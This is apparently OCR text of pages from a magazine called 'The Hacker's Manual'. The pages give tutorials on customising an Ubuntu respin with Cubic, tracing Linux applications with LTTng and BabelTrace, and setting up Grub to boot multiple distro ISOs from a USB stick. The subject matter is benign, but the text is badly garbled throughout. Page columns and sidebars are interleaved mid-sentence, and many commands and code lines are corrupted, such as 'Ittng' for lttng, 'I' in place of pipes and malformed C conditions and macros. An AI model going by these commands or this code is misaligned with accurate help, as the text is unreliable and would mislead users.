One downside of creating a respin is that you virtualiser, there's an option in Settings... >
usually reed to carry out the installation, the Storage > Controller: SATA called Use Host I/O
longest part of the respin process, over and over Cache', and we’ve found that it greatly speeds up
again. Typically, you’ll do this with a VM and any tasks such as installing a distro. There's a slight
increase in efficiency here is well worth it, risk of data loss within the VM if it crashes when
As with all file-based Linux work, increasing the using this option, but it’s not
amount of available memory will speed things up. a big deal with a job like this as you could just start
Allocating 2GB is about the minimum for the installation again.
reasonable performance. Allocate as many CPU Even if you plan to use the full install eventually,
cores as you can as the Ubuntu installer will make select 'minimal' in the Ubuntu installer to speed > VirtualBox (and possibly other VM
the most of them. If using VirtualBox as your things up when testing. managers) can speed up host I/O.

114 | The Hacker's Manual


Build your own custom Ubuntu distro
Plymouth themes at www.gnome-look.org.
Most come with an installation script.
To use with Cubic, download the theme
and unpack it and then copy the files to the
chroot environment using the 'copy' icon. At
the Cubic terminal, cd into the directory and
run the installation script. Once this has
completed, do rm -rf [name of directory] to
remove the directory with installation files so
that it isn’t copied to the installation ISO. See
the official Ubuntu Wiki (https://wiki.ubuntu.
com/Plymouth) for more information on
customising your own Plymouth themes.
Most of those instructions don't require
any modification to work under the Cubic
chroot, but having made the changes type
> The package removal page. If ticked, these packages will
not be added to the final Linux installation. update-initramfs -k all.

Custom PPAs
Users and wallpapers You can add debs and PPAs to Ubuntu in the normal way
Whenever a distribution like Ubuntu creates a new user it that you'd expect, using the chroot environment
creates a directory for that user and populates it with the on the Terminal page. So, for example, you could add
contents of the /etc/skel directory. Let's look at a case the Inkscape PPA and install Inkscape by typing:
where you want to give the user a custom backdrop image add-apt-repository ppa:inkscape.dev/stable
as soon as they log in for the first time. apt install inkscape
The snag is that different desktop environments use This means that Inkscape will now be installed from the
different methods to display the background image. This is get go, and when you update the system, the updated
a method that will work for LXDE. In the case versions will be pulled from the PPA rather
of LXDE. the file manager (PCManFM) draws the backdrop. than the Ubuntu repository. Do something like apt-cache
To begin the process try customising the LXDE desktop in a policy and cut and paste that into a text file if you want to
running VM, and set the backdrop image to something in keep a complete list of every repository you've added to the
the /usr/share/backgrounds/ directory. Having done this, system as a reminder for future respins.
copy the configuration file from its location within the home Add downloaded debs to the chroot environment
directory (-/.config/pcmanfm/LXDE/desktop-items-O. and install them with dpkg -i [name of .deb]. Nearly
conf). The parameter within this file happens to be everything will work, but occasionally something requires a
‘wallpapei=’ and you can edit it by hand if you want to. service that the chroot environment can't provide. As is the
On the other side, copy the files to the filesystem of the case with customising the user home directory, as detailed
Cubic chroot environment using the 'copy' icon at the top of earlier, if you can't automate the installation, you could copy
the Terminal page. Place the image in the same place as the .deb files manually and add a small post-install script, to
before by typing cd /usr/share/backgrounds/ and using the be invoked manually, to install them.
copy icon at the top. Happy respins!
Recreate the config directory structure and move into
that directory with:
cd /etc/skel
mkdir -p .config/pcmanfm/LXDE
cd .config/pcmanfm/LXDE
Following this, copy the desktop-items-O.conf file into
this directory using the copy icon.
There's quite a lot of potential here to pre-customise the
user environment using the method of customising in a
VM and then copying the configuration files. For example,
let's say that you were producing a custom installation ISO
for a college. In such a case, you might place a welcome
pack of useful files (PDFs, images, etc) into the home
directory. To do this, just place those files into /etc/skel
using the Cubic interface.
All of the splash screens, such as the startup screen,
used by Ubuntu Linux use a system called Plymouth.
Customising Plymouth is a lengthy topic in itself
as there are so many files that you can modify, and together
these constitute a theme. The easiest way to get started The ISO generation screen. This is a time-consuming process and memory and
with customising the splash screens is to browse the CPU usage will peak while it’s going on.

The Hacker's Manual | 115


Hacking

LTTng: Tracing
apps in Linux
It’s time to introduce the essentials of software tracing and how to
use LTTng for understanding what’s happening on a running system.
2. mtsouk@LTTng: - (ssh)
mtsouk@LTTng:~$ sudo apt-get install Ittng-tools Ittng-modules-dkms liblttng-ust-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
liblttng-ust-dev Ittng-modules-dkms Ittng-tools
0 upgraded, 3 newly installed, 0 to remove and 215 not upgraded.
Ubuntu 16.04
Need to get 0 B/873 kB of archives.
requires Ittng-tools,
After this operation, 6,191 kB of additional disk space will be used.
Ittng-modules-dkms Selecting previously unselected package liblttng-ust-dev;amd64.
and liblttng-ust-dev (Reading database ... 175696 files and directories currently installed.)
for LTTng to run Preparing to unpack ..,/liblttng-ust-dev_2.7.1-l_amd64.deb ...
properly. Unpacking liblttng-ust-dev:amd64 (2.7.1-1) ...
Selecting previously unselected package Ittng-modules-dkms.
Preparing to unpack ..,/lttng-modules-dkms_2.7.1-l_all.deb ...
Unpacking Ittng-modules-dkms (2.7.1-1) ...
Selecting previously unselected package Ittng-tools.
Preparing to unpack .../Ittng-tools_2.7.1-2~fakesyncl_amd64.deb ...
Unpacking Ittng-tools (2.7.1-2~fakesyncl) ...
Processing triggers for man-db (2.7.5-1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Processing triggers for systemd (229-4ubuntu4) ...
Setting up liblttng-ust-dev:amd64 (2.7.1-1) ...
Setting up Ittng-modules-dkms (2.7.1-1) ...
Loading new lttng-modules-2.7.1 DKMS files...
First Installation: checking all kernels...
Building only for 4.4.0-21-generic
Building initial module for 4.4.0-21-generic
Done._____________________________________________________________________________________________

TTng is an open source tracing framework that runs on (which are hardcoded at specific locations in the source

Software tracing
is the process of
understanding
L Linux. This enables you to understand the interactions
between multiple components of a system, such as the
kernel, C or C++, Java and Python applications. On the
Ubuntu 16.04 distro you can install LTTngaz follows:
code), and automatic (which are dynamically executed when
something specific happens). Controlling tracing is what you
can do using the Ittng command line utility. The following
command displays all available tracing events related to the
$ sudo apt-get install Ittng-tools Ittng-modules-dkms liblttng- Linux kernel:
what's happening
on a running ust-dev $ sudo Ittng list -kernel
software system. After a successful install you will see at least one process $ sudo Ittng list -kernel I wc
A trace application related to LTTng running (see above right for how the 234 1389 17062
can trace both
installation process looks in more detail): (You can see a small part of the output from Ittng list
user applications
# ps ax I grep -i Itt I grep -v grep -kernel. bottom right). If the previous commands fail then
and the OS at the
same time. If you're 3929 ? Ssl 0:00 /usr/bin/lttng-sessiond there’s a chance that the LTTng kernel module isn’t running,
an amateur Linux You can find the version of LTTng you are using with: which you can check with: $ Ismod I grep -i Itt.
user, you may find $ Ittng -version In that case, you can start LTTngas follows:
tracing difficult
Ittng (LTTng Trace Control) 2.7.1 - Herbe a Detoume $ sudo /etc/init.d/lttng-sessiond start
to understand, so
try using simple [ ok ] Starting Ittng-sessiond (via systemctl): Ittng-sessiond.
examples until it Using LTTng service.
makes more sense. LTTngdoes two main things: instrumenting and controlling If you try to run the LTTng list command without root
tracing. Instrumenting is the task of inserting probes into privileges, you will get an error message instead of the
source code, and there are two types of probes: manual, expected output:

116 | The Hacker's Manual


LTTng

Comparing LTTng to similar tools


There are many tracing tools for Linux including perf_events can solve many issues and is trace files in CTF format, which allows you to
DTrace. perf_events. SystemTap. sysdig. strace relatively safe to use and as a result it is very process them remotely or put them in a
and ftrace. SystemTap is the most powerful tool good for amateur users who don't need to database such as MongoDB or MySQL. However,
of all but LTTngcomes close, apart from the fact control everything on a Linux machine. Built into as you have to post-process the generated trace
that it doesn't offer an easy way to do in-kernel the Linux kernel, ftrace has many capabilities but files you cannot get real-time output from LTTng.
programming. DTrace is in an experimental state doesn't offer in-kernel programming, which Tne key to successful tracing is to choose a
on the Linux platform, its biggest advantage is means that you'll have to post-process its output. powerful tool, learn it well and stick with it. LTTng
that it also works on other Unix platforms LTTng has the lowest overhead of all tools makes a perfect candidate but don't choose a
including Solaris and Mac OS X. Alternatively, because its core is very simple and generates tool until you try several of them first.

$ Ittng list -kernel The above command must be executed at a specific time
Error: Unable to list kernel events: No session daemon is and the list of commands you’ll need to execute must follow
available this order:
Error: Command error $ Ittng create demo_session The philosophy of
Should you wish to avoid running all LTTng-related $ Ittng enable-event -a -k tracing is similar

$ Ittng start to the way you


commands as root, you should add the desired users to the
debug code: if you
tracing group as follows: $ /usr/lib/libreoffice/program/soffice.bin -writer &
have no idea what
$ sudo usermod -aG tracing <username> $ Ittng stop you are looking
To start an LTTng tracing session use: Waiting for data availability. for and where, no
$ Ittng create new_session Tracing stopped for session demo_session tool can help you
find your problem.
Session new_session created. After Ittng stop has finished, the contents of ~7lttng-
As a result, some
Traces will be written in /home/mtsouk/lttng-traces/new_ traces should be similar to the following: preparation is need
session-20160608-111933 $ Is -1R /home/mtsouk/lttng-traces/demo_ before using tools
$ Ittng list session-20160615-154836 such as LTTng.
Available tracing sessions: /home/mtsouk/lttng-traces/deino_session-20160615-154836:
1) new_session (/home/mtsouk/lttng-traces/new_ total 4
session-20160608-111933) [inactive] drwxrwx— 3 mtsouk mtsouk 4096 Jun 15 15:48 kernel
Trace path: /home/mtsouk/lttng-traces/new_
session-20160608-111933 /home/mtsouk/lttng-traces/demo_session-20160615-154836/
kernel:
Use Ittng list <session_name> for more details total 143480
$ Ittng list new_session -rw-rw—-1 mtsouk mtsouk 145408000 Jim 15 15:51
Tracing session new_session: [inactive] channel0_0
Trace path: /home/mtsouk/lttng-traces/new_ drwxrwx— 2 mtsouk mtsouk 4096 Jun 15 15:48 index
session-20160608-111933 -rw-rw-— 1 mtsouk mtsouk 1503232 Jun 15 15:48 metadata
$ Ittng destroy new_session
Session new_session destroyed /home/mtsouk/lttng-traces/demo_session-20160615-154836/
$ Ittng list kemel/index:
Currently no available tracing session total 32
The first command creates a new LTTng session named -rw-rw-— 1 mtsouk mtsouk 31096 Jun 15 15:51 channel0_0.
new_session and the second command lists all available idx
sessions. The third command displays more information $ file metadata
about a particular session while the fourth command
destroys an existing session. The last command verifies that 2. mtsou<@LTTng: - (ssh)

the new_session session has been successfully destroyed. mtsouk0LTTng:~$ uname -a


Linux LTTng 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x8
Although the destroy command looks dangerous, it’s 6_64 GNU/Linux
not—it just destroys the current session without touching any mtsouki?LTTng:~$ sudo Ittng list - kernel I head -45
Kernel events:
of the generated files that contain valuable information.
Please note that LTTng saves its trace files in -/Ittng- Ittng.logger (loglevel: TRACE.EMERG (0)) (type: tracepoint)
osoc_snd_soc_reg_write (loglevel: TRACE_EMERG (0)) (type: trocepoint)
traces. The directory name of each trace follows the session_ asoc.snd.soc.regread (loglevel: TRACE.EMERG (0)) (type: tracepoint)
asoc_snd_soc_preg_write (loglevel: TRACE.EMERG (0)) (type: tracepoint)
name-date-time pattern.
asoc_snd_soc_preg_read (loglevel: TRACE.EMERG (0)) (type: tracepoint)
asoc.snd.soc.bias.level.start (loglevel: TRACE.EMERG (0)) (type: tracepoint)

Tracing behaviour asoc.snd_soc_bias_level.done (loglevel: TRACEEMCRG (0)) (type: tracepoint)


asoc.snd-soc.dapm.start (loglevel: TRACE.EMERG (0)) (type: tracepoint)
This section will trace the behaviour of a Linux system after asoc_snd_soe_dopm_done (loglevel: TRACE.EMERG (0)) (type: tracepoint)
asoc..snd,.soc.dapm_widgetpower (loglevel: TRACE.EMERG (0)) (type: tracepoint)
executing LibreOffice Writer. However, before you start the asoc_snd_soc_dapm_widget_event_start (loglevel: TRACE.EMERG (0)) (type: tracepoint)
actual tracing, you should tell LT7hg which events you want to asoc.snd_soc_dapm_widget_event.done (loglevel: TRACE_EMERG (0)) (type: tracepoint)
asoc_snd_soe_dapm.walk.done (loglevel: TRACE.EMERG (0)) (type: tracepoint)
trace. This command tells LTTngto trace all kernel events: asoc.snd.soc.dapm.output.path (loglevel: TRACE.EMERG (0)) (type: tracepoint)
$ Ittng enable-event -a -k
> This Ittng command shows all tracing events related to kernel operations.
All kernel events are enabled in channel channelO

The Hacker's Manual | 117


Hacking

> As the output | < 2- mtsoukgLTTng: -/code/lttnt (ssti) However, in this case, the syscall_exit_open trace point is
mtsouk#LTTng:~/code/lttngS bobeltrace ~/lttng-traces/demosession 20160615-154836 2>/de
of babeltrace v/null I wc more useful, because it also shows the return value of the
3925739 80655724 547584568
is in plain text mtsouk€LTing:~/code/lttng$ bobeltrace ~/lttng-traces/demo_session-20160615-154836 2>/de open(2) system call:
v/null I grep syscoll. I awk {'print $4'} I sort I uniq *c I sort -rn I hood
format, you can 86623 syscall.entry.recvmsg: $ babeltrace ~/lttng-traces/demo_session-20160615-154836
86619 syscaU_exit_recvmsg:
use any text 86265 $y$call_entry_setiti«er: 2>/dev/null I grep syscall_exit_open I grep “ret = -1”
processing tool 86260 syscall_exit_setitimer:
47561 syscall_exit_select: [15:49:17.175257726] (-K).000000719) LTTng syscall_exit_
to investigate a 47548 syscoll.entry-select:

trace file, such


42009 SySCdU_entry_poU!
41968 syscall_exit_poll:
open: {cpu_id = 0}, {ret = -1}
as grep, awk, sort
29843 syscall_entry_writev:
29816 syscall,exit„writev:
If you read the man page of open(2), you'll find that a
mtsouktfLTTng:~/code/lttngS bobeltrace ~/lttng-traces/demo_sessxon 20160615 154836 2>/dc
and sed etc. v/null I awk {’print $4'} I sort I uniq -c I sort -rn I head
return value of -1 signifies an error. This means that such
284858 rcu_utilization:
242813 kme*n_kfree:
errors might be the potential root of the problem. The next
211166 kmc«n_cache_frce:
200557 kmefli.mffl pape alloc: sections will talk about tracing your own code.
177653 kmen_mm_poge_free;
139523 kmem_cache_alloc: Although the process of making LTTng to trace your own
134846 sched.stat.runtime:
134230 sched_switch: C code is relatively easy to follow, it involves many steps. The
first is creating your own trace events. As you will see, each
» metadata: Common Trace Format (CTF) packetized metadata trace event needs a provider name, a tracepoint name, a list
(LE), vl.8 of arguments and a list of fields.
$ file channel0_0 The initial version of the C code you want to trace, saved
channel0_0: Common Trace Format (CTF) trace data (LE) as fibo.c. is the following:
$ file index/channelO_O.idx #include <stdio.h>
index/channelO_O.idx: FoxPro FPT, blocks size 1, next free
block index 3253853377, field type 0 size_t fibonacci( size_t n)
As you can see, the size of the channel0_0 is about {
145MB, whereas the metadata file is significantly smaller. if (n = 0)
However, both files are stored in CTF format. So far, you have return 0;
your trace files. The next section will use the BabelTrace utility if(n=l)
to examine the generated trace data. return 1;
if(n = 2)
Analysing tracing data return 1;
The BabelTrace utility will be used for parsing the produced
trace files. The first thing you can do on a trace file is: return (fibonacci(n-1 )+fibonacci(n-2));
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 }
which prints the full contents of the trace file on your screen
and allows you to get a good idea about the captured trace int main(int argc, char **argv)
data. The next logical thing to do is filter the output in order {
to get closer to the information you really want. unsigned long i = 0;
As the output of babeltrace is plain text, you can use any for (i=0; i<=16; i++)
text processing utility, including grep and awk, to explore your printf("%li: %lu\n”, i, fibonacci(i));
data. The following awk code prints the top 10 of all calls: return 0;
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 }
2>/dev/null I awk {'print $4'} I sort I uniq -c I sort -rn I head In order to trace fibo.c. you will need the following LTTng
Similarly, this awk code prints the top 10 of system calls: code, which defines a new trace event:
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 tfundef TRACEPOINTPROVIDER
2>/dev/null I grep syscall_ I awk {'print $4'} I sort I uniq -c I tfdefine TRACEPOINTPROVIDER fibo
sort -rn I head
You can see the output of both commands (pictured tfundef TRACEPOINTJNCLUDE
above). The first shows that the total number of recorded #define TRACEPOINTJNCLUDE ",/fibo-lttng.h”
entries in demo_session-20160615-154836 is 3,925,739! After
this, you can count the total number of write system calls: #if !definedLHELLO_TP_H) II defined(TRACEPOINT_
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 I HEADER_MULTI_READ)
grep syscall_entry_writev I wc #define _HELL0_TP_H
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 I
The Ittng view
grep syscall_exit_writev I wc include <lttng/tracepoint.h>
command can
help you view Each system call has an entry point and an exit point,
the recorded which means that you can trace a system call when it’s about TRACEPOINT_EVENT(
trace records if to get executed and when it has finished its job. So. for the fibo,
you execute it writev(2) system call, there exists syscall_entry_writev and tracing_fibo,
after Ittng stop
syscallexitwritev. TP_ARGS(
and before Ittng
destroy. However, As our executable file is LibreOffice Writer, the next output sizeJ, inputJnteger
Ittng view still will tell you more about its system calls: ),
executestebe/trare $ babeltrace ~/lttng-traces/demo_session-20160615-154836 TP_FELDS(
in the background.
2>/dev/null I grep -i Libre ctf_integer(size_t, input_integer_field, inputjnteger)
The command (below) will show which files were opened: )
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 )
2>/dev/null I grep syscall_entry_open

118 | The Hacker's Manual


LTTng

#endif/* _HELLO_TP_H 7
#include <lttng/tracepoint-event.h>
This is saved as fibo-lttng.h and defines a new trace event
The BabelTrace tool F
with a full name of fibo:tracing_fibo . The input_integer_field BabelTrace is a tool that helps you deal you to convert from a text log to CTF
is the text that will be written in the trace files. According to with various trace files, including the but you will not need it if you are only
trace files generated by LTTng. It allows dealing with LTTng.
the C standard, the size_t type, used in both fibo-lttng.h and
you to read, write and convert trace files You can learn more about babeltrace
fibo.c. is an unsigned integer type of at least 16-bit.
using the Common Trace Format (CTF) at http://diamon.org/babeltrace
You are also going to need a file named fibo-lttng.c:
and is very useful for presenting CTF You could also try using Trace Compass
tfdefine TRACEPOINTJ2REATE_PROBES files onscreen. If BabelTrace isn't (http:y7tracecompass.org) to view
#define TRACEPOINT_DEFINE already installed, you can get it with: LTTngtrace files, which is a graphical
$ sudo apt-get install babeltrace application. You can also learn
^include “fibo-lttng.h” The babeltrace-log utility that comes more about the CTF format at
The main purpose of fibo-lttng.c is to have fibo-lttng.h with the babeltrace package enables http://diamon.org/ctf.
included in it in order to compile it:
$ gcc -Wall -c -I. fibo-lttng.c The last thing to do before executing traceMex is to
$ Is -1 fibo-lttng.* compile it:
-rw-rw-r- 1 mtsouk mtsouk 84 Jun 17 19:09 fibo-lttng.c $ gcc -c traceMe.c
-rw-rw-r- 1 mtsouk mtsouk 497 Jim 17 19:11 fibo-lttng.h $ gcc -o traceMe traceMe.o fibo-lttng.o -Idl -llttng-ust
-rw-rw-r- 1 mtsouk mtsouk 11600 Jun 17 19:12 fibo-lttng.o You should enable the trace event defined in fibo-lttng.h
So, now that you have fibo-lttng.o. you are ready to make after starting a tracing session:
the necessary changes to fibo.c and compile it. The final $ Ittng create fibo_session
version of fibox will be saved as traceMex. This output uses $ Ittng enable-event -userspace fibo:tracing_fibo
the diff command to show the differences between fibo.c After starting the new session, you can finally execute
and traceMex: traceMex. allow it to finish and stop the tracing process:
$ diff fibo.c traceMe.c $ Ittng start
la2,3 $ ,/traceMe
> //include <unistd.h> $ Ittng stop
> //include “fibo-lttng.h" $ Ittng destroy
4a7 Running the command (below) while ,/traceMe is still
> tracepointffibo, tracingjfibo, n); being executed will reveal all available user space trace
11C14 events, including the one you declared in fibo-lttng.h:
< return (fibonacci(n-l)+fibonacci(n-2)); $ Ittng list "userspace
In order to get any output from this, the traceMex
> return (fibonacci(n-l)+fibonacci(n-2)); executable must be running—this is the reason for calling
16a20 sleep(l) in traceMex. (See the output below).
> sleep(lO); The data from the trace can be found at -/Ittng-traces/
20a25 fibo_session-20160617-193031 As traceMex uses a
recursive function, its output has 5,151 lines, but usually you
As you can see. you must include one extra header file - will get less output when tracing a single event.
the one you created earlier - as well as an extra tracepointQ .
You can call tracepointQ as many times as you want Analysing C code
anywhere in the C code. The first parameter of tracepointQ is The output of babeltrace would be similar to the following:
the name of the provider, the second is the name of the trace $ babeltrace ~/lttng-traces/fibo_session-20160617-193031
point, and the rest is the list of parameters you're [19:31:26.857710729] (+?.?????????) LTTng fibo:tracing_fibo:
inspecting—in this case, you are inspecting just one variable. {cpu_id = 0}, {input_integer_field = 0}
[19:31:26.857753542] (+0.000042813) LTTng fibo:tracing_fibo:
2. mttouk^LTTnfl; -/code/Utofl (uh)
mtsoukR.TTng:~/code/lttng$ bobeltroce ~/lttng-traces/fibo_session-20160617-193031 I aMc {’p
{cpujd = 0}, {inputJnteger_field = 1}
rint $13’} I $prt I uniq -c I sort -m
15% 2
$ babeltrace ~/lttng-traces/fibo_session-20160617-1930311
987 1
986 3
wc
609 4
376 5
5151 72114 540934
232 6
143 7 An awk script will reveal the number of times traceMex
88 8
549 calculates each Fibonacci number:
33 10
20 11 $ babeltrace ~/lttng-traces/fibo_session-20160617-1930311
12 12
7 13 awk {'print $13'} I sort I uniq -c I sort -m
4 14
2 15 (The output can be seen, left), as you can understand.
1 16
1 0 traceMe.c needs to be optimised! If you want to trace Python
mtsoukR.TTng:~/code/lttnq$ ./troceMe
9; 0 applications, you will need to install one extra package:
1: 1
2: 1 $ pip search Ittn
3: 2
4: 3 Ittnganalyses - LTTng analyses
5: 5
6: 8 Ittngust - LTTng-UST Python agent
7: 13
$ sudo pip install Ittngust
Here we are processing the output of traceMe.c Tracing Python code is beyond the scope of this tutorial
using babeltrace which reveals that there is a serious but you can learn more about it at http://lttng.org/
performance problem in traceMe.c. docs/#doc-python-application. ■

The Hacker's Manual | 119


Hacking

Grub: Boot
ISOs from USB
An easy way to avoid a bag full of DVDs is by copying them all to one USB
stick, along with a convenient menu to pick which one to boot.
lmost all of the distribution (distro) ISO files on cover least for the poor sap having to get the DVD working, is that

A DVDs are what are known as hybrid files. This means


that not only can they be written to a CD or DVD in

with dd. The USB stick will then boot as if it were a DVD. This
different distros need to be treated differently and the options
to boot from them as ISOs is rarely documented.
the normal way but they can also be copied to a USB stick In the next few pages, we will show you how to do this;
how to set up a USB stick in the first place and the options
is a handy way of creating install discs for computers that you need for the favourite distros. We will also show you how
don't have an optical drive, but it has one significant to deal with less co-operative distros.
drawback; Each ISO image requires a USB flash drive to itself.
With USB sticks holding tens or even hundreds of gigabytes Setting up the USB stick
costing only a few pounds, and small drives becoming harder First, we need to format the stick. We will assume that the
to find, this is a waste of space both on the stick and in your stick is set up with a single partition, although you could use
pocket or computer bag. Wouldn't it be good to be able to put the first partition of a multi-partition layout. What you cannot
several ISO files on the same USB stick and choose which get away with is a stick formatted with no partition table, as
one to boot? Not only is this more convenient than a handful some are. If that's the case, use fdisk or GParted to partition
of USB sticks, it's both faster and more compact than a the drive, then you can create the filesystem. The choice of
handful of DVDs. filesystem is largely up to you, as long as it is something that
The good news is that this is possible with most distros, Grub can read.
and the clue to how it's done is on our cover DVDs each We've used FAT and ext2 (there’s no point in using the
month. We used to laboriously unpack distro ISOs onto the journalling ext3 or ext4 on a flash drive). Use whatever fits in
DVD so that we could boot them and then we had to include with your other planned uses of the drive, we generally stick
scripts to reconstruct the ISO files for those that wanted to with FAT as it means we can download and add ISO images
burn a single distro to a disc. Then we started using Grub to from a Windows computer if necessary. Whatever you use
boot the DVD, which has features that make booting from ISO give the filesystem a label, we used MULTIBOOT, as it will be
files possible. The main disadvantage of this approach, at important later.

Use GParted
or one of the
command-line
tools to prepare
your flash drive.
Giving the
filesystem a label
is important for
booting some
distros ISOs.

120 | The Hacker's Manual


Grub

EFI booting
In this instance, we've created a flash portable option, but if you need to boot boot /dev/sde
drive that uses the old style MBR booting. your stick using UEFI, change the grub- This is a 64-bit target, as UEFI is only
While most computers of the last few install command to use the UEFI target, fully supported on 64-bit hardware. If
years use UEFI, they still have a like this: you want to use your USB stick with
compatibility mode to boot from an MBR. $ sudo grub-install --target=x86_54-efi 32-bit equipment, stick (sorry) with the
So this makes our stick the most -boot-directory=/media/MULTIBOOT/ MBR booting method.

In these examples, the USB stick is at /dev/sde (th s


computer has a silly number of hard drives) and the
filesystem is mounted at /media/sdel. amend the paths to
suit your circumstances. First, we install Grub on the stick to Ubuntu 16,0|

Fedora 24
make it bootable:
Arch Linux
$ mkdir -p /media/MULTIBOOT/boot
Adding System Rescue Cd 4.8.1
$ sudo grub-install -target=i386-pc -boot-directory=/media/ Ultimate Boot CO S.3.S
MULTIBOOT/boot /dev/sde
Note: the boot-directory option points to the folder that
will contain the Grub files but the device name you give is the
whole stick, not the partition. Now we create a Grub
configuration file with:
$ grub-mkconfig -o /media/MULTIBOOT/boot/grub/grub.cfg
This will create a configuration to boot the distros on your
hard drive, so load grub.cfg into an editor and remove
everything after the line that says:
### END /etc/grub.d/OO_header ###
Press enter to boot the selected OS, e' to edit the commands before booting or 'c' for a command-li

Adding a distro
This gives us a bare configuration file with no menu entries. initrd (loop)/casper/initrd.lz > If you are
creating a flash
If we booted from this stick now. we would be dropped into a }
drive to share,
Grub shell, so let's add a menu. We'll start with an Ubuntu ISO menuentry "Install Ubuntu 16.04" {
you may want
because they are popular (sorry, but they are) and because linux (loop)/casper/vmlinuz.efi file=/cdrom/preseed/
to look at the
they make booting from an ISO file easy (after all, it's Ubuntu, ubuntu.seed boot=casper iso-scan/filename=$isofile only- theme section
it makes most things easy). Load grub.cfg back into ycur ubiquity quiet splash — of the Grub
editor and add this to the end of the file: initrd (loop)/casper/initrd.lz manual to make
submenu "Ubuntu 16.04" { } your boot screen
set isofile=/Ubuntu/ubuntu- 16.04-desktop-amd64.iso } look prettier.
loopback loop $isofile Create the Ubuntu directory on the drive and copy over
menuentry "Try Ubuntu 16.04 without installing" { the ISO file. Then unmount the drive and reboot from the
linux (loop)/casper/vmlinuz.efi file=/cdrom/preseed/ stick. You should see a Grub menu with one entry for Ubuntu
ubuntu.seed boot=casper iso-scan/filename=$isofile quiet that opens up to reveal boot and install options,
splash —
Special options
The first line creates a variable containing the path to the ISO
file. We use a variable because it means we only need to make
one change when we want to adapt the menu to a different
release. The second line tells Grub to mount that as a loop
device (a way of mounting a file as if it were a block device).
Then we have the two menu entries. You may be wondering
how do we know what options to add to the menu entries.
That comes from a combination of looking at the ISO’s
original boot menu and knowing what to add for an ISO boot.
The latter, in the case of Ubuntu, is to add
iso-scan/filename=$isofile
where the variable isofile was set to the path to the file a
use the I and I keys to select which entry is highlighted.
Press enten to boot the selected OS. e' to edit the cowaods befo/e booting o^ t'
for a command-line.
couple of lines earlier. To see the original boot menu, we need
to mount the ISO file, which is done like this:
$ sudo mount -o loop /path/to/iso /mnt/somewhere
> This is the basic menu you get with a default Grub Most ISOs use isolinux to boot so you need to look at the
configuration—functional but not very pretty. CFG files in the isolinux or boot/isolinux directory of your »

The Hacker's Manual | 121


Hacking
» mounted ISO file. The main file is isolinux.cfg but some iso-info command—you'll have at least one installed if you
distros use this to load other CFG files. In the case of Ubuntu, have a DVD writer in this way:
this is in a file called txt.cfg. You're looking for something like: $ isoinfo -d -i /path/to/image.iso
label live or
menu label ATry Ubuntu without installing $ iso-info -d -i /path/to/image.iso
kernel /casper/vmlinuz.efi The device node is trickier since it will vary according to
append file=/cdrom/preseed/ubuntu.seed boot=casper what you plug the stick into. The simplest solution is to give
initrd=/casper/initrd.lz quiet splash — the USB stick’s filesystem a label, which is why we added one
The kernel setting translates to the Linux option in Grub when we created the filesystem. If your filesystem currently
with the addition of (loop) to the path. Similarly, the initrd has no label, you can add one with either:
part of the append line corresponds to Grub's initrd line. $ fatlabel /dev/sdel MULTIBOOT
The rest of append file is added to the Linux line along with or
the isoscan option. This approach will work with most distros $ e21abel /dev/sdel MULTIBOOT
based on Ubuntu, although some have removed the ISO depending on the filesystem type you chose. You can also
booting functionality for some reason. It's possible to add this read the label, if you're not sure what it's currently set to, by
back, as we will see shortly. using one of the above commands without specifying a label.
Now you can refer to the disk by label in the Grub menu with
Other distros device=/dev/disk/by-label/MULTIBOOT
There's no standard for booting from an ISO image, each and it will be found no matter what device name it is given.
distro implements it differently, or not at all. For example, to
boot an Arch-based ISO you need something like this Many distros
submenu "Arch Linux" { There are other variations on the menu options for various
set device=/dev/sdel distros. we've supplied a load here www.linuxformat.com/
set isofile=/Aich/archlinux-2016.09.03-dual.iso files/code/tggl5.boot.zip. Just edit them to suit the
set isolabel=ARCH_201609 versions of the ISO images you are using. So far, we have
loopback loop Sisofile modified the main grub.cfg file for each ISO we have added,
but that can get a bit messy when you have more than a
menuentry "Arch Linux" { couple of distros. and editing it to remove older versions can
linux (loop)/arch/boot/x86_64/vmlinuz img_dev=$device also be a source of errors. It would be nice if we could update
img_loop=$isofile archisolabel=$isolabel archisobasedir=arch the menus automatically—and we can. Instead of adding the
earlymodules=loop information to the main menu, put each distro's menu details
initrd (loop)/arch/boot/x86_64/archiso.img in a file in the same directory as the ISO image, let's call it
} submenu. Now we can use Grub's ability to include
} information from other files in its menu to build a menu.
As you can see, dealing with this distro is a little different Create a file in the root of the USB stick called updatemenu,
as it requires more than the path to the ISO file. It also containing this:
requires the filesystem label of the ISO and the device node #!/bin/sh
for your USB stick. The first can be found with the isoinfo or cd $(dirname $0)
sudo grub-mkconfig 2>/dev/null I sed -n '\%BEGIN /etc/
grub.d/00_header%,\%END /etc/grub.d/OO_header%p' >1
boot/grub/grub.cfg
for menu in ‘/submenu; do
echo "source /$menu" »boot/grub/grub.cfg
done
Make it executable and run it from a terminal after adding
or removing menu entries. If you are using a FAT filesystem
on the USB drive, you may need to run it like this.
$ sh /path/to/drive/updatemenu
The first line changes the directory to the location of the
script, so it's important to put it in the root of the flash drive.
The next line extracts the header portion of the default grub,
cfg then the for loop adds each of the individual submenus.
The distros are added in alphabetic order, if you want to force
a particular order, start each directory's name with a number:
OlJJbuntu, 02_Fedora and so on. This changes the order but
not the names displayed, those are set by the submenu
command at the top of each section.

Getting tricky
What do you do if you want to boot an ISO for which we don't
> If you want, you can tweak your menus. The Grub online manual shows all the have a recipe? You could try a web search, but if that doesn't
options. The SystemRescueCd example on the DVD uses one such command to show up anything useful, you can examine the ISO's boot
only show the 64-bit options when relevant. process directly. Almost all Linux distros use an initramfs to

122 | The Hacker's Manual


Grub
boot. This is a compressed file containing a small root
filesystem that takes care of loading any necessary drivers Booting an ISO from hard disk
and then mounting the real root filesystem before passing
You can also use this method to boot an means you will always have one without
control to it. The kernel mounts this filesystem and then looks
ISO image from your hard disk. Why having to hunt for the appropriate CD or
for a script called init in it (no, I'm not repeating myself there). would you want to do this? If you are USB stick. If you put the submenu entry
